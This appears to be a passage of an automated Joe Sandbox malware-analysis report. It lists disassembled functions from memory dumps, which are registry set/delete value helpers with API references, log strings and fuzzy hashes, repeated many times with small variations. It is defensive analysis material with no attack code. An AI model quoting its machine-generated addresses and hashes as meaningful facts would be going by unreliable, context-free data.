Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 1001908780-3542721600
Opcode ID: 65008b44c4f079c0671a940b285b04cbb2c56ce62817bf01ff20aa7ae2b78fcb
Instruction ID: 56f8f7a6ae9182a22cd319cdc6e60220cc0dd4387abdf59d6c1787c9ed7f288a
Opcode Fuzzy Hash: 65008b44c4f079c0671a940b285b04cbb2c56ce62817bf01ff20aa7ae2b78fcb
Instruction Fuzzy Hash: 29E09262A0CE0680E7119B82BC004BD3219EF807A0F4401B9D94E465B0AE2CE985E301

Function 00007FFE1150E0CF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1150E175

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

registry_set_value, xrefs: 00007FFE1150E18E
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE1150E195

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 1001908780-3542721600
Opcode ID: 2aff72e031674af7b39c3b0c2b33f8ac3c6bebc49797e51394ce98bc8fad6267
Instruction ID: 01120babfc0dfd29caf8c18de3acfa919df223e7932e7b319a33f8d9915672c4
Opcode Fuzzy Hash: 2aff72e031674af7b39c3b0c2b33f8ac3c6bebc49797e51394ce98bc8fad6267
Instruction Fuzzy Hash: CBE09262A0CE0680E7119B82FC005BD3219EF807A0F4401B9D94E465B09E2CE589E301

Function 00007FFE13308845 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE133088F5

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

Strings

[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE13308915
registry_set_value, xrefs: 00007FFE1330890E

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 1001908780-3542721600
Opcode ID: 68af31fda512251a4e7095c64759633a77901c269178442763b3f75b46be7b38
Instruction ID: 5a87436a39ac2109275d0248fda966a6ec0329d9a75aa17ecaf284b34ff2a135
Opcode Fuzzy Hash: 68af31fda512251a4e7095c64759633a77901c269178442763b3f75b46be7b38
Instruction Fuzzy Hash: 19E09212B0CE16C8F5119B06B8000B92600AB607B5F0002B1EE2E2A6B6DE2CD9859308

Function 00007FFE1330884F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE133088F5

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

Strings

[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE13308915
registry_set_value, xrefs: 00007FFE1330890E

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 1001908780-3542721600
Opcode ID: b15d2ccd7713901b812b792a66e2f8fc9b9e8b1f5e597a7986e6778bc4d5d9eb
Instruction ID: 3e36e2b463ced23977bb13ea15cd45586c67dd2e8c0ddccf9078d78ed89061b7
Opcode Fuzzy Hash: b15d2ccd7713901b812b792a66e2f8fc9b9e8b1f5e597a7986e6778bc4d5d9eb
Instruction Fuzzy Hash: 89E09212A0CE16C8F5119B06FC001B92600AB607B1F0001B1EE2E2A5B6DE2CD5899308

Function 00007FFE13308926 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE133088F5

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

Strings

[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE13308915
registry_set_value, xrefs: 00007FFE1330890E

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 1001908780-3542721600
Opcode ID: 3240549721cbf0bfa7b4d65ab79497177ef46608b14afe113a87adda5e44bb4c
Instruction ID: 3e29237696016c9cc5206928b53976fb15fea219d398d4d8b48fbc3a98c295cc
Opcode Fuzzy Hash: 3240549721cbf0bfa7b4d65ab79497177ef46608b14afe113a87adda5e44bb4c
Instruction Fuzzy Hash: 79E09212A0CE16C8F6119B02F8000B92600AB607B5F0042B1EA6E2A6B6DE2CD9899308

Function 00007FFE133088D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE133088F5

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

Strings

[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE13308915
registry_set_value, xrefs: 00007FFE1330890E

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 1001908780-3542721600
Opcode ID: 0d3f0688ba3eb7ac108ce3e1ea9f224433ea670d95ad91698c67122ec0279f11
Instruction ID: 0972c8fe7c2d90b36c6eb011e5722d1070ae5b82b78e4ed888f1d8ee8fc208a4
Opcode Fuzzy Hash: 0d3f0688ba3eb7ac108ce3e1ea9f224433ea670d95ad91698c67122ec0279f11
Instruction Fuzzy Hash: ACE09212A0CE16C8F5119B06BC000B92604EB607B5F0001B2EE2E2A6B6DE2CD9859308

Function 00007FFE133088E4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE133088F5

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

Strings

[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE13308915
registry_set_value, xrefs: 00007FFE1330890E

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 1001908780-3542721600
Opcode ID: ea89032756dacee166776ffae6fe81aad5936c2262cb6e165c1c53a0e3aac8bb
Instruction ID: 9063dea4df9634656364152e073e26f07248c9ee043e9d63e8c61509ce96efb0
Opcode Fuzzy Hash: ea89032756dacee166776ffae6fe81aad5936c2262cb6e165c1c53a0e3aac8bb
Instruction Fuzzy Hash: 01E09212A0CE16C9F5119B46B8001B96600AB607B5F0001B2EE2E6A6B6DE2CD9859308

Function 00007FFE0EB42F06 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0EB42F25

Part of subcall function 00007FFE0EB41292: fwrite.MSVCRT ref: 00007FFE0EB4133E
Part of subcall function 00007FFE0EB41292: fflush.MSVCRT ref: 00007FFE0EB4134A

Strings

registry_set_value, xrefs: 00007FFE0EB42F3E
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE0EB42F45

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 1001908780-3542721600
Opcode ID: 736e72fec16e77405d14e9c66c2c49a54fc340fafdf6bf8932278b63aaf1b47f
Instruction ID: fb37462a46331167796d9835f0a4adaadca4619b67523c6b2119781792dcef21
Opcode Fuzzy Hash: 736e72fec16e77405d14e9c66c2c49a54fc340fafdf6bf8932278b63aaf1b47f
Instruction Fuzzy Hash: 40E01A93A1C70681E572AF09BC001B92354EF91794F840136ED8E926B8DE2CEA89AB01

Function 00007FFE1150DD41 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1150DDE7

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

registry_del_value, xrefs: 00007FFE1150DE00
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE1150DE07

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 1001908780-1337547089
Opcode ID: 784c336f12923c52a9e57a2fe13529c35abaa978284f2e402610d2e187fa47d1
Instruction ID: e27199bf02ba69d979690466f52a396bd5881afff93c9da1cc98c67a1e8f57ac
Opcode Fuzzy Hash: 784c336f12923c52a9e57a2fe13529c35abaa978284f2e402610d2e187fa47d1
Instruction Fuzzy Hash: 00E04F62A1CE0681E7516B96FC402BD336DFF907E4F4401B9DD4E425B0AE6CEA89D300

Function 00007FFE1150DE18 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1150DDE7

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

registry_del_value, xrefs: 00007FFE1150DE00
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE1150DE07

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 1001908780-1337547089
Opcode ID: 36385e915446ca97f37af8c8b7ca8d6c0f7bba0581d8162f54604cfa489c2086
Instruction ID: e09bf95502881bad9f9d3d05fb7c7e927ee34ac616a43819966ed5debf3e301f
Opcode Fuzzy Hash: 36385e915446ca97f37af8c8b7ca8d6c0f7bba0581d8162f54604cfa489c2086
Instruction Fuzzy Hash: 04E04F62A1CE0681E751AB96FC401BD336DFF907E8F4401B9DD4E426B0AE6CEA89D301

Function 00007FFE1150DDC8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1150DDE7

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

registry_del_value, xrefs: 00007FFE1150DE00
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE1150DE07

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 1001908780-1337547089
Opcode ID: a677593f49293dc8cb4a76836c6329c2e09004cd0ec74f1c5a474f2dbdc7842f
Instruction ID: 12bd50ad623405be97f1702f755577442fd534950801db5086378a8419e3581b
Opcode Fuzzy Hash: a677593f49293dc8cb4a76836c6329c2e09004cd0ec74f1c5a474f2dbdc7842f
Instruction Fuzzy Hash: 8BE04F66A1CE0681E751AB96FC401BD336DFF907E8F4401B9DD4E426B0AE6CEA85D301

Function 00007FFE1150DDD6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1150DDE7

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

registry_del_value, xrefs: 00007FFE1150DE00
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE1150DE07

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 1001908780-1337547089
Opcode ID: 62d9323b6c03070f9d9da292037cf0c85ec39e68ac9708cfa3f9b38eb96afc76
Instruction ID: 0bb9122b2244956c8d4d6c81dd4446f6b0c2df8f63e23c730a346ccb9ee73ae5
Opcode Fuzzy Hash: 62d9323b6c03070f9d9da292037cf0c85ec39e68ac9708cfa3f9b38eb96afc76
Instruction Fuzzy Hash: 5CE04F62A1CE0681E751AB96FC401BD736DFF907E8F4401B9DD4E826B0AE6CEA85D301

Function 00007FFE1150DD37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1150DDE7

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

registry_del_value, xrefs: 00007FFE1150DE00
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE1150DE07

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 1001908780-1337547089
Opcode ID: 1c07fbf2c4e1f608a8164a2e6e0a5dad0009d04c9ecbbd7e3252efda15aaeace
Instruction ID: 5b0c5bfac285029825e19f85dc623c73a645d383dd0881fafdc8c01e368d9af7
Opcode Fuzzy Hash: 1c07fbf2c4e1f608a8164a2e6e0a5dad0009d04c9ecbbd7e3252efda15aaeace
Instruction Fuzzy Hash: 23E04F62A1CE0A81E751AB96FC401BD336DFF907E8F4401B9DD4E426B1AE6CEA85D301

Function 00007FFE13308598 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE13308567

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

Strings

[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE13308587
registry_del_value, xrefs: 00007FFE13308580

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 1001908780-1337547089
Opcode ID: 4b431bc60d81371c458d6948ff5b4065c7745a213b89ab18d77d76538e87061d
Instruction ID: 76b64d619b6309555721ddf0cd190c7435df2f209a4c628e5b609d05967ff77b
Opcode Fuzzy Hash: 4b431bc60d81371c458d6948ff5b4065c7745a213b89ab18d77d76538e87061d
Instruction Fuzzy Hash: A7E01A61A0CE0AC9E510AB56FC001BD2614FBA07B4F4441B5DE6F6A6B2DE2CE9999308

Function 00007FFE13308548 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE13308567

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

Strings

[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE13308587
registry_del_value, xrefs: 00007FFE13308580

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 1001908780-1337547089
Opcode ID: 2701b3d6a9ab9bbf95a547988e9a3aa90bcac870f82cf6104b82374a091489e9
Instruction ID: 52bb516d4a49db91bc3f2adc010ad553731049a416afe12190a41b47865b9c8d
Opcode Fuzzy Hash: 2701b3d6a9ab9bbf95a547988e9a3aa90bcac870f82cf6104b82374a091489e9
Instruction Fuzzy Hash: 02E04851A0CE06C9F511EB56FC001BD2614FFA07B4F4441B5DD6F67672DE2CD5959308

Function 00007FFE13308556 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE13308567

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

Strings

[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE13308587
registry_del_value, xrefs: 00007FFE13308580

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
